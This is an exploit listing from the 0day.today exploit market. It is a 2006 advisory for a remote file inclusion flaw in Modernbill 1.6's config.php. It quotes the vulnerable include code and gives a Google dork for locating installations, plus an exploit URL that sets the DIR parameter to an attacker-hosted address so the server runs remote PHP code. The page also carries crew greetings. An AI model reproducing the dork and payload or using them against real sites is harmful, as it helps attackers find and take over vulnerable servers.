[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Modernbill <= 1.6 (config.php) Remote File Include Vulnerability

Author
Solpot
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-647
Category
web applications
Date add
06-08-2006
Platform
unsorted
================================================================
Modernbill <= 1.6 (config.php) Remote File Include Vulnerability
================================================================



#############################SolpotCrew Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "DIR" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################




#  0day.today [2024-12-25]  #